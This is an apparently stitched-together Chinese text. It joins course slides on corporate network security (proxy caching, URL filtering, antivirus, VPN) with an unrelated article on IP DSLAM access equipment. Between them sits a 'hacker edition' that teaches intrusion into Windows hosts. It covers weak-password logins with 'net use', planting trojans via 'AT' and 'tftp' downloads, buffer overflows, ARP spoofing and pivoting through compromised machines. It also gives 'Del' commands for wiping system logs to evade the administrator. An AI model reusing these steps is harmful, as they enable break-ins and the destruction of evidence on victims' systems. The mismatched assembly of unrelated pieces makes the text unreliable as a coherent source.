·有人使用公司的Internet系统访问色情网站。
·有人使用公司的Internet系统访问反动站点。
·管理人员无法知道Internet系统的使用情况。
Internet访问的解决方法
· 对于问题一,采用内容缓存系统。
· 对于问题二,采用Internet 站点过滤系统。
内容缓存系统
·1、Client 发起http连接请求
·2、Proxy 收到请求后将检查内部缓存内是否有所需内容,若有,则返还给Client。
·3、若无,则Proxy根据请求向目的服务器发起请求。
·4、Web服务器将内容返回到Proxy服务器。
·5、Proxy服务器将得到的内容发回给Client,并在自己的缓存中保存一份。
Internet站点过滤系统 (一)
·1、Client 发起http连接请求
·2、连接到达防火墙时防火墙将URL送到WebSense Server 检查。
·3、WebSense 将审查结果返回到防火墙。
·4、防火墙根据其策略决定是否让该连接通过。
Internet站点过滤系统 (二)
·1、Client 发起http连接请求
·2、Proxy 受到请求后将URL送到WebSense Server检查。
·3、Proxy根据返回的结果决定是否接收该连接请求。
病毒防范系统
· 互连网时代对防病毒系统的要求
· 计算机病毒解决方法
· 典型病毒防范系统部署
互联网时代对防病毒系统的要求
· 由于计算机的联网使用,使得病毒传播的途径大为增多:网络文件共享、电子邮件、Int
ernet文件下载,传播速度也大为加快。
· 新病毒的出现速度加快,用户的防病毒软件的病毒特征码没能及时更新。
· 目前已出现了恶意的Java、ActiveX,当使用者浏览到包含这些代码的网页时,会造成安
全问题。
· 一些来历不明的电子邮件程序或下载的程序中带有特洛依木马,可能会造成受害者的主
机被他人控制。
计算机病毒解决方法
· 从系统的观点考虑病毒的防范,在所有病毒传输的途径上均配置防病毒软件,如客户端
(Win98、 · Win2000)、文件服务器(NT、Netware)、邮件服务器(Exchange、Lotus
Notes)、Internet接入系统(Proxy、Firewall)等。
· 整个病毒防范系统采用集中管理的方式,病毒特征码统一更新,安全策略集中设定,从
而使得整个网络系统的病毒特征码得到快速更新。
· 通过在客户端的浏览器和Proxy、Firewall中嵌入病毒检查软件,来防范下在程序中带有
的病毒和可能的恶意Java、ActiveX等可执行代码的攻击。
VPN(虚拟私有网)
· 数据加密分类
· 物理线路加密
· 数据链路加密
· 网络层加密—IPSec
· 传输层加密—SSL
数据加密类型
·物理层->物理层 物理线路加密
·数据链路层->数据链路层 (路由器访问)
·在数据链路层(如PPP)进行加密 L2TP、PPTP、L2F
·网络层->网络层(路由器 防火墙 主机)
·在网络层 (如IP)进行加密 IPSec
·传输层->传输层 (对TCP进行加密 SSL)
·应用层->应用层(在应用层 (如TCP)进行加密 S/MIME、SET、SSH)
物理线路加密
· DDN 加密机
· 帧中继加密机
· 异步拨号Modem
· ISDN线路密码机
· ATM加密机
注:传输层加密
·Secure Sockets Layer (SSL) 是一个端到端的Internet 安全协议,通过采用数字证书,
它提供了数据加密、身份认证的功能。SSL建立在传输层,它为客户机和服务器在应用级建
立起一个端到断的安全会话。
·SSL代理—128位的高强度加密模块
结束语·恭喜你:
·学完这些并且可以熟练应用,已经是一个真正的网络安全专家了!
·希望此时的你旁边有个温柔稍有点调皮的女朋友,为这孤独而寂寞的网络添加一点跳动的
色彩!
黑客编:
必须要掌握的几个命令
·Net
·netsh
·Ftp
·hostname
·Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping
必须要掌握的几个协议
·http
·dns
·ftp
·Pop
·Smtp
·Icmp
·Udp
·tcp
开始
·掌握了黑客攻击的方式和手段后,那么学习黑客就简单多了!
·因为你掌握了这些,剩余的就是使用工具入侵
·熟悉掌握一套自己用的黑客工具
高级
·自己编写专用的黑客工具
·自己发现系统漏洞
黑客入侵手段
·收集信息:
· 收集要入侵的目标信息
· IP,域名,端口,漏洞,位置
弱口令
·在nt\2000\xp\2003中弱口令可以用
·Net use \ip “password” /user:user
·如果目标机开3389服务,可以直接连接
·在sql的sa弱口令,可以用sql连接器直接 ·登陆
后门木马
·如果有ipc$共享,可以过去木马后门
·用at启动
·AT \ip time /INTERACTIVE
·如果可以得到shell,也可以用tftp
·Tftp.exe –i ip get *.* *.*
·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行
密码破解
·远程破解mysql,mssql,ftp,mail,共享密码
·本地破解管理员(administrator)密码
缓冲溢出
·可以用缓冲溢出攻击,
·比如流行的webdev,rdcom模块漏洞
·可以直接得到system管理权限
·缓冲溢出后的一般现象是:
·Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Web服务漏洞
·例如:
·Unicode漏洞遍历磁盘和执行程序
·二次编码漏洞遍历磁盘和执行程序
·.HTR漏洞查看源代码
嗅探监听
·例如:
·针对web监听
·针对mail监听
·工具如:sinffer , iris
欺骗攻击
·例如:
·运用arp欺骗攻击
伪装欺骗
·常见的如:mail病毒
·把一个文件改名字甚至图标,欺骗对方执行
社会工程学
·例如:
·QQ聊天诱惑
·EMAIL信息
·电话
·诱惑
拒绝服务
·例如:
·Dos攻击
·Ddos攻击
利用跳板
·利用自己的肉鸡作为跳板攻击别的机器
·My PC------>跳板(肉鸡)--->目标
路由器漏洞
·如:
·原始密码
·程序漏洞
防火墙
·利用欺骗攻击防火墙,导致防火墙功能失效
·利用防火墙的模块漏洞
unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix 等
·这些目前先不讲解
精通黑客工具
·必须有一套自己可以完全掌握的黑客工具
·如端口扫描 Nscan,bluescanport
·监听工具:sinffer iris
·telnet工具:nc
·扫描工具:sss,nmap, LANguard
·后门工具:radmin,winshell
·密码破解:lc4
·远程管理:pcanywhere
·会使用各种经典的黑客工具
清除日志
·在你入侵机器以后,离开的时候,要完全清除
·自己在那台机器上留下的痕迹
·例如清除
·Del C:\WINNT\system32\LogFiles\*.*
·Del C:\WINNT\system32\*.log
·Del C:\WINNT\system32\*.txt
·Del C:\WINNT\*.log
·Del c:\winnt\*.txt
如果你不清除日志
·当目标机器的管理员发现你的证据
·完全可以让你在大墙内渡过一段日子
黑客
·当你完全掌握这些后
·你就成为了一名小黑客
高级
·编写自己的黑客工具
·发现系统漏洞
高级黑客
·目前你足以成为一个高级黑客了
真正的黑客
·精通各种网络协议
·精通操作系统
·精通编程技术
·精通安全防护
·不搞破坏
·挑战技术难题
结束
⑤ 什么是DSLAM设备
数字用户线接入复用器(DSLAM)是xDSL的局端设备。随着xDSL业务在固网市场的迅速普及,DSLAM技术也在发展,本文旨在对目前的一个热点问题-IP DSLAM技术进行探讨。
一、IP DSLAM产生的背景
传统的DSLAM是一个完全的ATM架构的设备,也就是常说的基于ATM方式的DSLAM。它提供ATM接口(如155Mbit/s的ATM接口或N*2Mbit/s IMA ATM接口),上联城域核心网,具有ATM VP/VC交叉连接,提供ATM流量汇聚、通过ATM的QoS技术来实现业务的服务质量及流量控制。目前网上实际安装的DSLAM绝大多数都是这种方式的DSLAM。但是,由于在很多地区运营商已不再对其已有的城域ATM核心网进行扩容并转而建设IP宽带城域核心网,因此随着城域ATM可用资源的日益减少,基于ATM方式的DSLAM已越来越难以适应实际组网的需要,而IP DSLAM将成为DSLAM未来发展的方向。
二、IP DSLAM的定义和功能
目前对于IP DSLAM的定义众说纷纭,广义的说法是将所有具有IP上联端口的DSLAM都统称为IP DSLAM。当然,更准确地说,IP DSLAM应该称为Packet DSLAM,这是因为目前许多提供IP上联接口的DSLAM只完成Ethernet层功能,并不对IP层协议进行处理,而那些能够完成IP层处理,实现IP数据包路由的DSLAM才是真正意义上的IP DSLAM。
IP DSLAM从实现的功能角度划分,可分为两种形态,一种形态的DSLAM仅对Ethernet层(Layer2)进行处理,另一种形态的DSLAM不仅对Ethernet层进行处理,而且还对IP层进行处理并将宽带接入服务器BAS功能集成进来。
第一种形态的DSLAM具体完成以下功能。
1.支持二层Ethernet数据包的本地转发使能/禁止控制;
2.支持基于端口的二层Ethernet数据包的过滤,有些设备还支持基于MAC地址(包括源MAC地址、目的MAC地址)的数据包过滤
3.支持不同ADSL端口的二层隔离;
4.支持IEEE 802.1Q协议,支持按照端口划分VLAN,有些设备还支持按照MAC地址划分VLAN;
5.广播风暴抑制,可对广播包、多播包进行流量抑制;
6.端口配置、端口状态查询和设置,基于端口的数据流收发统计;
7.当DSLAM提供多个FE/GE上联口时,支持IEEE802.3ad链路聚集功能;
8.支持流量控制功能;
9.支持IGMP Snooping组播功能。
另外,还有一些设备还实现了IEEE802.1p优先级控制、IEEE802.1d 生成树功能以及802.1x端口接入控制功能。
第二种形态的DSLAM除支持Ethernet层功能之外,还具备以下功能。
1.IP数据包的转发,支持静态路由、RIPv2、OSPF协议;
2.支持IP组播,并支持IP组播IGMPv2、DVMRP、PIM协议;
3.支持用户接入速率控制;
4.支持IP优先级控制及排队策略(WRR、DRR、WFQ、WF2Q等),有些设备还支持拥塞控制功能;
5.支持动态和静态分配用户IP地址;
6.宽带接入服务器功能。目前,主流的宽带接入服务器都支持PPPoE/PPPoA用户接入控制,也有一些设备同时支持PPPoE/PPPoA和802.1x认证。由于集成了BAS功能,相应的还具有以下功能。
7.支持ADSL专线用户IP地址防盗用;
8.支持ADSL用户接入帐号和端口捆绑;
9.支持限制ADSL同一PVC下获取IP地址数目;
10.支持本地和Radius两种用户认证方式;
11.必须支持自动检测用户的异常下线,并释放相应的网络资源,停止记费。
12.提供认证成功后的用户按时长和流量的计费信息。
三、IP DSLAM的分类
IP DSLAM从系统设计的角度又可分为两种类型,一种是采用ATM信元总线/矩阵交换内核,并具有IP上行接口的IP DSLAM,另一种是在xDSL线路接口卡完成ATM和IP的转换,同时采用大容量的IP交换内核的IP DSLAM。
对于第一种方式的IP DSLAM,存在以下一些问题。
1.DSLAM在进行ATM与IP转换时需要消耗大量资源,而集中在上行接口板统一处理无疑使上行接口成为了瓶颈,在数据流量较大时很容易导致设备上行端口拥塞;
2.由于沿用了ATM内核,其级联是通过ATM内部总线采用专用线缆直接级连。在实现级连时由于数据流量更大,上行瓶颈现象更为严重。这使得网络扩容非常困难;
3.ATM的机制本身不支持点到多点的传输模式,如果要实现只能通过CPU在每条PVC逐个拷贝,开销大且效率低下。所以采用ATM内核的 DSLAM很难支持组播业务;
为了解决上述问题,国内一些厂家陆续推出了采用IP内核的IP DSLAM.由于采用了全新的技术架构,具有IP内核的DSLAM具有以下一些特点。
1.全分布式ATM与IP转换,大大提高设备整体处理能力,分散设备故障风险,提高设备的性能和稳定性;
2.全分布式ATM转换,可将ATM PVC直接与VLAN ID相对应,满足专线用户安全性要求,并支持基于VLAN的VPN应用;
3.全分布式ATM转换,可充分利用成熟廉价的三层交换架构,提供非常高的背板交换能力,支持ADSL线速转发,消除设备交换瓶颈;
4.IP内核设计,可利用大容量交换背板提供高带宽端口支持能力,可支持多个GE/FE接口,消除设备上行带宽瓶颈;
5.由于采用IP内核设计,不必受ATM总线扩容的约束,利用高密度的高带宽端口,可实现灵活的级联扩容,并支持比传统方式大7倍以上的单点用户容量;
6.当用户迁移时无需对ATM PVC作全程配置,用户端与网络无需作任何改动,即可为用户继续提供服务,大大缩短了业务变更时间,减少业务提供的工作量;
7.利用IP内核提供的组播支持能力,可在DSLAM和上行设备上开通组播业务和视频点播业务提升了网络的业务提供能力,并为更多的增值应用奠定了优越的网络基础;
8.支持全分布式PPPoE认证,无需集中式BRAS设备即可提供用户的认证、计费和管理能力并与原有运营模式完全兼容,避免集中式BRAS引入的性能、稳定性和业务支持能力瓶颈,提高了整网的稳定性和带宽提供能力;
9.采用全分布式认证,继承了PPPoE认证对用户管理的能力,而且由于用户认证时可将每用户的物理位置信息(该DSLAM的IP地址,该用户在DSLAM上的物理端口号)携带给RADIUS,实现IP地址反查非常容易;
10.采用全分布式PPPoE认证,可利用帐号+端口的绑定能力,提供运营商要求的网络安全性和防止资费流失;
11.采用PPPoE认证,可根据用户开户时的要求在RADIUS上生成数据,动态分配带宽,无需每设备配置,也无须复杂的PVC配置,节省运营成本,并提供带宽包月,时长+带宽+优惠政策等的复杂计费策略,丰富了ADSL的产品线;
四、结论
应该说,在现有城域核心网从ATM向IP转变的趋势下,ATM DSLAM将不可避免地被IP DSLAM所取代。而对于采用IP内核架构的IP DSLAM,由于其鲜明的特点并具有天然的BAS集成能力,在未来的DSLAM市场中将占据重要的一席之地。
当然,采用全分布式的BAS组网也会给网络的组织、运营维护也会带来一定的问题,因此,笔者的观点是,对于一个电信级可运营、可管理的城域网,在整网存在大量宽带用户的情况下,BAS的网络组织将是一个集中式和分布式的综合。对于宽带用户密集且数量较大的地区,采用具有BAS功能的IP DSLAM将成为一种趋势。